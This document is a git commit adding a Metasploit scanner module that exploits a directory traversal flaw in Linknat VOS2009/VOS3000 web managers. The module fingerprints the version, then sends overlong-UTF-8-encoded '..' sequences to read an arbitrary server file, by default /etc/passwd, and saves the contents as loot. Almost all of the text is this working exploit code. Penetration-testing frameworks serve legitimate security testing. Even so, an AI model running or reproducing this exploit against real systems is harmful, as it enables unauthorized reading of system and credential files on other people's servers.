add Linknat Vos Manager Traversal

2016-02-15 12:39:40 +08:00 · 2016-02-15 12:39:40 +08:00 · f35230b908
parent b2765a296f
commit f35230b908
1 changed files with 93 additions and 0 deletions
--- a/modules/auxiliary/scanner/http/linknat_vos_traversal.rb
+++ b/modules/auxiliary/scanner/http/linknat_vos_traversal.rb
@ -0,0 +1,93 @@
 ##
 # This module requires Metasploit: http://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 require 'msf/core'
 class Metasploit3 < Msf::Auxiliary
  include Msf::Auxiliary::Report
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Scanner
  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Linknat Vos Manager Traversal',
      'Description' => %q(
        This module attempts to test whether a file traversal vulnerability
        is present in version of linknat vos2009/vos3000
      ),
      'References' => [
        ['URL', 'http://www.linknat.com/'],
        ['URL', 'http://www.wooyun.org/bugs/wooyun-2010-0145458']
      ],
      'Author'         => ['Nixawk'],
      'License'        => MSF_LICENSE))
    register_options(
      [
        Opt::RPORT(80),
        OptString.new('TARGETURI', [true, 'The path of Linknat Vos Manager (/chs/, /cht/, /eng/)', '/eng/']),
        OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd']),
        OptInt.new('TRAVERSAL_DEPTH', [true, 'Traversal depth', 5])
      ], self.class)
  end
  def vos_uri(path)
    full_uri =~ %r{/$} ? "#{full_uri}#{path}" : "#{full_uri}/#{path}"
  end
  def vos_version
    case target_uri.to_s
    when /chs/i
      js_uri = vos_uri('js/lang_zh_cn.js')
    when /cht/i
      js_uri = vos_uri('js/lang_zh_tw.js')
    when /eng/i
      js_uri = vos_uri('js/lang_en_us.js')
    else
      print_warning("#{full_uri} - Please identify VOS version manually")
      return
    end
    res = send_request_cgi('uri' => js_uri)
    return unless res
    vprint_status("#{js_uri} - HTTP/#{res.proto} #{res.code} #{res.message}")
    return unless res.code == 200
    res.body =~ /s\[8\] = \"([^"]*)\"/m ? major = $1 : major = nil
    res.body =~ /s\[169\] = \"[^:]*: ([^"\\]*)\"/m ? minor = $1 : minor = nil
    "#{major} #{minor}"
  end
  def run_host(ip)
    version = vos_version
    unless version
      print_error("#{full_uri} - Failed to identify Linknat VOS")
      return
    end
    traversal = '/%c0%ae%c0%ae' * datastore['TRAVERSAL_DEPTH']
    filename = datastore['FILEPATH']
    uri = normalize_uri(target_uri.path, '..', traversal, filename)
    res = send_request_cgi(
      'method'  => 'GET',
      'uri'     => uri
    )
    if res && res.code == 200
      path = store_loot(
        version,
        'text/plain',
        ip,
        res.body,
        filename)
      print_good("#{full_uri} - File saved in: #{path}")
    else
      print_error("#{full_uri} - Nothing was downloaded")
    end
  end
 end